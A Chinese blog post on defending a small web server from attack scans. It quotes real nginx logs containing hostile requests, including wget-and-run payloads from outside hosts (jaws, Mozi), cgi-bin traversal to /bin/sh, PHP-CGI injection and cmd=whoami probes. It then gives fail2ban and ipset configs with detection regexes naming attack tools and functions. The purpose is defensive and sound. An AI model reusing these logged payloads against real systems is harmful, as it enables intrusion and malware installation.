WEB服务攻击扫描防御

原创已于 2025-08-21 17:43:01 修改 · 1.3k 阅读

24 ·

CC 4.0 BY-SA版权

文章标签：

#网络 #服务器

于 2025-08-12 13:46:08 首次发布

日志详情：

这里只列举部分日志，其实攻击行为非常多向我这个小网站基本每天几百个IP攻击或者恶意扫描。

8.219.50.197 - - [11/Aug/2025:02:53:35 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
172.203.234.251 - - [11/Aug/2025:02:54:03 +0800] "GET /owa/auth/logon.aspx HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
159.89.171.89 - - [11/Aug/2025:03:23:43 +0800] "" 400 0 "-" "-" "-"
205.210.31.195 - - [11/Aug/2025:04:04:06 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x9B\xA2~|6\x19\xA1\xC0\xA5\xAF\xCCf\xDF\xD6Zl\xB4\xB31\xCB'\x84" 400 150 "-" "-" "-"
205.210.31.195 - - [11/Aug/2025:04:04:06 +0800] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03:\x83\xD8\xD8?\xAD\xB7\x80 \xFAc\xD1\xFE\xB0\xFE\x1E0\x8F Go\x8D\x05sU\xF9\xAD\xA9o5|\xE3\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0" 400 150 "-" "-" "-"
167.94.145.100 - - [11/Aug/2025:04:22:33 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
117.209.93.63 - - [11/Aug/2025:04:48:18 +0800] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 150 "-" "-" "-"
103.56.60.82 - - [11/Aug/2025:05:13:49 +0800] "GET /cdn-cgi/trace HTTP/1.1" 404 13978 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-"
20.38.33.240 - - [11/Aug/2025:05:32:20 +0800] "SSH-2.0-Go" 400 150 "-" "-" "-"
20.38.33.240 - - [11/Aug/2025:05:32:20 +0800] "MGLNDD_107.173.244.159_443" 400 150 "-" "-" "-"
162.142.125.37 - - [11/Aug/2025:05:58:05 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
170.64.177.244 - - [11/Aug/2025:07:24:57 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
170.64.177.244 - - [11/Aug/2025:07:24:58 +0800] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
162.142.125.44 - - [11/Aug/2025:07:29:42 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
34.76.134.123 - - [11/Aug/2025:08:07:14 +0800] "GET / HTTP/1.1" 301 162 "-" "python-requests/2.32.4" "-"
87.236.176.124 - - [11/Aug/2025:08:42:23 +0800] "GET / HTTP/1.1" 403 146 "http://107.173.244.159" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-"
101.126.128.249 - - [11/Aug/2025:08:54:59 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
170.106.148.137 - - [11/Aug/2025:08:55:26 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
193.32.249.162 - - [11/Aug/2025:09:11:30 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
162.216.149.70 - - [11/Aug/2025:09:19:25 +0800] "GET / HTTP/1.1" 403 146 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
104.23.217.30 - - [11/Aug/2025:09:21:05 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 403 13978 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.68.10.207 - - [11/Aug/2025:09:21:23 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 403 13978 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
101.126.128.249 - - [11/Aug/2025:09:31:01 +0800] "GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%7D%7B.exec|%7B.?cmd.%7D|timeout=15|out=abc.%7D%7B.?n.%7D%7B.?n.%7DRESULT:%7B.?n.%7D%7B.^abc.%7D====%7B.?n.%7D HTTP/1.1" 403 146 "-" "curl/7.29.0" "-"
65.49.1.152 - - [11/Aug/2025:10:01:04 +0800] "GET /webui/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" "-"
101.126.128.249 - - [11/Aug/2025:10:21:10 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
148.113.210.228 - - [11/Aug/2025:11:00:18 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x92$bo \xFD\x88UT\xDDF\xC7p\x8C\xA9F\xB0\x90DJ\xA5H3(\xCB\xDD$\x9A\xD4\x9F\xFCL \xDE\xAF\x8A\xCC\xD3V\x95Y\xB6\x84Lo(\x89\xF2\xB72'\x22\x95\xD9\xB6\x00\xE5\xB6\xA2\xB6&\xC6Lk\x9A\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:39 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
212.20.145.175 - - [11/Aug/2025:12:06:37 +0800] "GET / HTTP/1.0" 301 162 "-" "-" "-"
35.203.210.206 - - [11/Aug/2025:12:10:20 +0800] "GET / HTTP/1.1" 403 146 "http://107.173.244.159:80/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
217.156.22.214 - - [11/Aug/2025:12:59:27 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
217.156.22.214 - - [11/Aug/2025:12:59:28 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 13978 "-" "libredtail-http" "-"
167.94.146.52 - - [11/Aug/2025:13:13:19 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
167.94.146.50 - - [11/Aug/2025:13:14:12 +0800] "PRI * HTTP/2.0" 400 150 "-" "-" "-"
167.94.138.61 - - [11/Aug/2025:13:25:09 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
107.173.244.159 - - [11/Aug/2025:13:42:46 +0800] "GET /images/tools/ipinfo.png HTTP/1.1" 404 14129 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
41.238.71.170 - - [11/Aug/2025:13:57:49 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
107.173.244.159 - - [11/Aug/2025:14:37:09 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
27.128.25.63 - - [11/Aug/2025:14:37:25 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
68.183.82.202 - - [11/Aug/2025:14:38:10 +0800] "GET /ab2g HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
107.173.244.159 - - [11/Aug/2025:14:40:16 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
107.173.244.159 - - [11/Aug/2025:14:40:47 +0800] "GET /ipinfo?format=json HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-"
172.202.118.43 - - [11/Aug/2025:14:41:46 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" "-"
101.126.128.249 - - [11/Aug/2025:15:01:23 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"
8.219.58.39 - - [11/Aug/2025:15:10:27 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
104.234.115.197 - - [11/Aug/2025:15:15:11 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x1E\x92j\xAF\x97\x13\x81m\xF0\xC5\x94\x05\xAAg\x093\xE5\xDC\x16E\x1E\x0F\xED\xBE~\xAA1\x0E\x9F?\xC8- \x8Emc\xDA\xEA\xAB\xE2\xA2\xB71\xAE \x14\x07\x1F\x9E\x10\xC0\xD5\xE0\xE3" 400 150 "-" "-" "-"
172.178.83.104 - - [11/Aug/2025:23:02:48 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
34.135.131.184 - - [11/Aug/2025:23:07:54 +0800] "\x16\x03\x01\x00M\x01\x00\x00I\x03\x03\xC4\xE8\xC0\x11\xA8\x1F\x95`<\x83i\x97\x0E\x0B \x83\xA7\xE3H1M\x96\x5C7+\xD1\x8D\xCAv\x96u\xAF \x8A\xD6M;\x09\x9F\xF4w\xF9\xA7\x8D\x91" 400 150 "-" "-" "-"
20.169.104.180 - - [11/Aug/2025:23:33:56 +0800] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET / HTTP/1.1" 400 248 "-" "fasthttp" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET /aaa9 HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
95.215.0.144 - - [11/Aug/2025:23:35:56 +0800] "GET /aaa9 HTTP/1.1" 400 650 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
83.222.191.218 - - [12/Aug/2025:00:44:31 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
172.68.243.36 - - [12/Aug/2025:01:03:29 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
162.158.134.112 - - [12/Aug/2025:01:03:30 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 403 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.70.240.3 - - [12/Aug/2025:01:04:53 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
172.70.240.147 - - [12/Aug/2025:01:04:54 +0800] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 403 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "2a06:98c0:3600::103"
185.177.72.57 - - [12/Aug/2025:01:05:37 +0800] "GET /.git/HEAD HTTP/1.1" 301 162 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:07 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:08 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
124.71.231.117 - - [12/Aug/2025:01:14:08 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 162 "-" "libredtail-http" "-"
114.34.131.134 - - [12/Aug/2025:01:42:40 +0800] "GET / HTTP/1.0" 301 162 "-" "-" "-"
94.72.107.3 - - [12/Aug/2025:02:51:58 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 301 162 "http://107.173.244.159:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
94.72.107.3 - - [12/Aug/2025:02:51:58 +0800] "" 400 0 "-" "-" "-"
113.238.76.71 - - [12/Aug/2025:02:58:48 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 301 162 "-" "Hello, World" "-"
113.238.76.71 - - [12/Aug/2025:02:58:50 +0800] "sh+/tmp/gpon80&ipv=0" 400 150 "-" "-" "-"
156.211.246.3 - - [12/Aug/2025:04:53:54 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 400 150 "-" "-" "-"
45.227.254.146 - - [12/Aug/2025:05:23:24 +0800] "GET /RDWeb/Pages/ HTTP/1.1" 404 14114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
190.92.243.48 - - [12/Aug/2025:05:45:13 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
104.152.52.154 - - [12/Aug/2025:05:52:56 +0800] "\x16\x03\x01\x00\xE6\x01\x00\x00\xE2\x03\x03i\x9E+C\xDE\xD4y;:{\x1C" 400 150 "-" "-" "-"
104.152.52.162 - - [12/Aug/2025:05:52:56 +0800] "GET / HTTP/1.1" 301 162 "-" "curl/7.61.1" "-"
104.152.52.162 - - [12/Aug/2025:05:52:56 +0800] "GET /favicon.ico HTTP/1.1" 301 162 "-" "curl/7.61.1" "-"
198.235.24.101 - - [12/Aug/2025:06:17:52 +0800] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03u(?" 400 150 "-" "-" "-"
198.235.24.101 - - [12/Aug/2025:06:17:52 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03p\xAB}7\xFD\x99\xB97\x04B\xAC\x80\x08\xB21\xB9\xB0\xE9\xE6d\xBD7V\xD6fY\xA1\xE1\xF9" 400 150 "-" "-" "-"
20.106.196.31 - - [12/Aug/2025:06:34:13 +0800] "GET /manager/text/list HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x" "-"
135.237.127.190 - - [12/Aug/2025:07:24:50 +0800] "GET /version HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-"
198.235.24.207 - - [12/Aug/2025:08:15:50 +0800] "GET / HTTP/1.1" 403 146 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-"
20.65.193.243 - - [12/Aug/2025:08:17:38 +0800] "GET /manager/text/list HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" "-"
165.22.173.123 - - [12/Aug/2025:08:20:19 +0800] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
165.22.173.123 - - [12/Aug/2025:08:20:19 +0800] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-"
194.164.107.4 - - [12/Aug/2025:09:03:19 +0800] "\x16\x03\x01\x00\xE8\x01\x00\x00\xE4\x03\x03p\xB7\xFB(\x8E?x\x1AG\xD6<]\x093B\x85\x1D\xF1@u\xAF\x01:~0[\xF2\x98\xA0\xB2l\xD4 \x12Z\xA7\xB0\x8C@\x8A!)gg\x9A4\x94\x1D\x09m\xA5ZP\xBC\xC75t\xC4w|\x1BVC\xCD\x9F\x00 zz\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x01\x00\x00{\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00" 400 150 "-" "-" "-"
34.38.154.242 - - [12/Aug/2025:09:13:08 +0800] "GET / HTTP/1.1" 403 146 "-" "python-requests/2.32.4" "-"

恶意请求

以下面这条日志为例

167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"

这是典型的 目录穿越攻击（Directory Traversal），试图跳出 Web 根目录，访问系统中的可执行程序如 /bin/sh；
%2e 是 URL 编码的 .，多个 %2e 是想构造 ../../../../... 路径；
目标路径 /cgi-bin/... 是很多设备（如路由器、摄像头、旧服务器）容易暴露的 CGI 入口；
目的是尝试 远程代码执行（RCE），或者用 sh 启动反弹 shell。

拆解关键部分：

* `POST /cgi-bin/.../bin/sh`: 这是访问 CGI 程序目录 `/cgi-bin` 中的 shell（即 Linux 的 `/bin/sh`）。
* `%%32%65` 实际是双重编码的 **`.` 字符**

---

### 🧠 什么是 `%%32%65`？

#### 一层解码 `%32%65`

* `%32` = ASCII `'2'`
* `%65` = ASCII `'e'`
* `%2e` = ASCII `.`（小数点）

所以 `%2e` 就是 `.`
但攻击者用了 **双重编码：`%%32%65` → `%2e` → `.`**

#### 最终结果：
/cgi-bin/%%32%65%%32%65/.../bin/sh
↓
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/.../bin/sh
↓
/cgi-bin/../../../../../../bin/sh

也就是试图通过 .. 一层层逃逸目录，最后访问服务器根目录的 /bin/sh 命令行解释器。

攻击目的：

这种请求是典型的 目录穿越（traversal）+ RCE 组合攻击。
如果服务器配置错误，攻击者可能执行如下命令：
```
POST /cgi-bin/../../.../bin/sh
Content: echo; id
```
返回当前用户身份 —— 如果是 普通用户，还好；如果是 root，那攻击者就可能控制整台机器。

当前 Nginx 的返回状态码是 `400`：

表示请求格式无效，Nginx 本身识别不了双重编码的路径，所以拒绝了，说明未被成功利用。
**但是！**攻击者在测试你是否存在漏洞，如果换成了某些老版本的 Tomcat、Apache、PHP CGI，就可能执行成功！

防范这类攻击的主要方法和思路：

Web服务器层面防护

严格访问控制
- 关闭不必要的接口和路径，避免暴露敏感文件夹如 /wp-includes/、/cgi-bin/、/admin/、/.git/ 等。
- 对敏感目录和接口设置访问权限，仅允许可信IP或登录用户访问。
- 404 或 403 响应时避免泄露服务器信息。
限流和封禁（Fail2ban、nginx限速等）
- 利用 Fail2ban 结合nginx日志规则，自动封禁频繁访问敏感路径或带有攻击特征的IP。
- nginx 自带限速模块限制单IP请求频率，防止刷请求。
- 配合防火墙（iptables、firewalld）限制异常连接。
Web应用防火墙（WAF）
- 使用 WAF（如ModSecurity、Cloudflare WAF、阿里云/腾讯云WAF）过滤恶意请求，拦截SQL注入、XSS、路径穿越等攻击。
- WAF也能识别爬虫和自动化攻击特征，自动阻断。

应用层面防护

代码安全和漏洞修复
- 定期更新应用程序及依赖库，修补漏洞。
- 禁止未授权的访问，做好身份验证和权限控制。
- 对用户输入做严格校验和过滤，防止注入攻击。
隐藏敏感信息和接口
- 隐藏版本信息、错误堆栈详情等，避免给攻击者提示。
- 使用非标准路径替换默认管理路径。

网络层面防护

防DDoS服务
- 通过云服务商或硬件设备做流量清洗，防止大规模流量攻击。
- 限制IP连接数，限制协议层异常流量。
黑白名单管理
- 对可信IP做白名单，敏感操作限制白名单访问。
- 记录和分析异常流量，自动加入黑名单。

日志监控与响应

实时监控访问日志
- 使用fail2ban、ELK等监控系统分析日志，发现异常行为。
- 定期审计异常请求，优化防护策略。
自动化响应机制
- 结合安全工具自动封禁攻击IP，或自动调整防火墙规则。
- 预置报警，及时通知管理员。

常见实用工具和技术

Fail2ban — 自动封禁异常IP
nginx限速模块 — 限制请求速率
ModSecurity — 开源WAF模块
云WAF — 云厂商提供的应用层安全服务
iptables/firewalld — 网络层规则封禁
日志分析 — ELK、Graylog、Splunk等

简单总结

防范手段	作用	推荐措施
Web服务器配置	限制路径访问，隐藏信息	禁止访问敏感路径，隐藏404详情
Fail2ban封禁	自动封禁恶意IP	写准规则，及时封禁攻击者
nginx限速	防止流量刷爆	限制单IP连接数及请求频率
WAF	过滤攻击请求	部署ModSecurity或云WAF
代码安全	修补漏洞，过滤输入	定期更新，防注入和漏洞
流量清洗/DDoS	防大规模攻击	云端清洗，设备限流
日志监控与告警	快速响应安全事件	自动封禁、报警通知

具体防御方法

我这个服务器没花多少钱，后续也不想在花钱了所以都是用的免费的方法，仅供参考哈。

安装防御工具

我这里用的是 fail2ban + ipset 这个性能损失最小，其实也可以只用fail2ban 但是封禁的ip多了以后对性能有影响。

yum install epel-release -y
yum install ipset -y
yum install fail2ban -y

确认安装完成：

fail2ban-client --version

配置 fail2ban

默认配置文件在 /etc/fail2ban/ 目录：

主配置文件是 /etc/fail2ban/jail.conf（不要直接改它）
建议用 /etc/fail2ban/jail.local 或 /etc/fail2ban/jail.d/*.local 来写自定义配置，升级时不会被覆盖。
我这用的全都是自定义配置

创建 Fail2Ban 的 `ipset` 封禁动作

Fail2Ban 默认的封禁动作是修改 iptables，我们现在改成使用 ipset。

创建自定义规则文件

## 注意默认是有这个文件的  把这个文件备份一下 然后删除全部内容添加我下面自定义的规则 直接用这个文件会有问题
mv /etc/fail2ban/action.d/iptables-ipset-proto4.conf /etc/fail2ban/action.d/iptables-ipset-proto4.conf.bak
vim /etc/fail2ban/action.d/iptables-ipset-proto4.conf

粘贴以下内容：

[Definition]

# 启动时执行的操作：
# 1. 创建一个 ipset 集合，类型为 hash:ip，IPv4，设置超时时间为 <bantime>（封禁时间），
#    使用 -exist 防止集合已存在时报错。
# 2. 向 iptables 的 INPUT 链插入一条规则，匹配来源 IP 属于该 ipset 集合的流量，直接 DROP（丢弃）
actionstart =
    ipset create <name> hash:ip family inet timeout <bantime> -exist
    iptables -I INPUT -m set --match-set <name> src -j DROP

# 停止时执行的操作：
# 1. 从 iptables INPUT 链删除之前添加的 DROP 规则
# 2. 清空 ipset 集合内所有 IP
# 3. 销毁 ipset 集合
actionstop =
    iptables -D INPUT -m set --match-set <name> src -j DROP
    ipset flush <name>
    ipset destroy <name>

# 检查 ipset 集合是否存在，存在返回 0，否则返回错误
actioncheck =
    ipset list <name> > /dev/null 2>&1

# 封禁某个 IP，添加到 ipset 集合中
# -exist 参数避免重复添加时报错
# 注意这里不要使用 timeout 参数，timeout 只在创建集合时设置
actionban =
    ipset add <name> <ip> -exist

# 解封某个 IP，从 ipset 集合中删除
# 可能不存在时忽略错误
actionunban =
    ipset del <name> <ip> 2>/dev/null || true

[Init]
# 集合名称变量，调用时传入具体名称，比如 f2b-nginx-malicious
name = <name>

创建自定义 jail.local 中使用 `ipset` 动作

当前规则是封禁ip20天

vim /etc/fail2ban/jail.d/nginx-malicious.conf

粘贴以下内容：

[nginx-malicious]
enabled = true
filter = nginx-malicious
logpath = /var/log/nginx/access.log
maxretry = 1
findtime = 600
bantime = 1728000
action = iptables-ipset-proto4[name=nginx-malicious]

创建 failregex 规则

vim /etc/fail2ban/filter.d/nginx-malicious.conf

粘贴以下内容：

[Definition]
failregex =
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*/(\.env|api|webui|HNAP1|phpmyadmin|actuator|geoserver|\.git|\.svn|\.sql|\.tar\.gz|\.bak|\.old|\.DS_Store|admin|config|login|debug|shell|test|hidden|\.well-known|setup).*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*"(curl|python|aiohttp|gptbot|scrapy|sqlmap|masscan|zgrab|nmap|scan|dirbuster|wafw00f|nikto|paloaltonetworks|mozi|bot|crawler|spider|AhrefsBot|SemrushBot|MJ12bot|DotBot|PetalBot|Bytespider)" .*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*%%25[0-9A-Fa-f]{2}.* (200|301|302|400|403|404).*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*(\.\./|%%2e%%2e|%%32%%65|%%33%%32|%%2f).*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*cmd=.*(exec\||whoami|system\(|shell_exec|passthru|assert|base64_decode).*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*base64_decode.*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*eval\(|system\(|shell_exec\(|assert\(|passthru\(" .*
    ^<HOST> - - \[.*\] ".*" 400 .*
    ^<HOST> - - \[.*\] "PRI \* HTTP/2\.0" 400 .*
    ^<HOST> - - \[.*\] "[A-Z0-9_\.]+" 400 .*
    ^<HOST> - - \[.*\] "\s*" 400 .*
    ^<HOST> - - \[.*\] "SSH-2\.0-Go" 400 .*
    ^<HOST> - -.* "(GET|POST|HEAD) /(phpinfo|info|phpmyadmin|pma|admin|dbadmin|mysql|test|shell|cmd|backdoor|eval|upload|config|debug|x\.php|1\.php|password\.php|upl\.php|t4|geoip).*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(\?file=|\?path=|\?dir=|\?page=|\?url=|\?include=|\?inc=|\?require=).*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(http|https)://.*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(\.\./|\.\\\.\\|%%2e%%2e|%%2f).*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) /.*/.*\.php(\?.*)? HTTP/1\.[01]" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) /.*/.*\.php\.(jpg|png|gif|txt|bak|swp|save)" (200|301|302|403|404|400) .*
    ^<HOST> - - \[.*\] "GET / HTTP/1\.[01]" (200|301|302|403|404|400) "-" "-" "-"
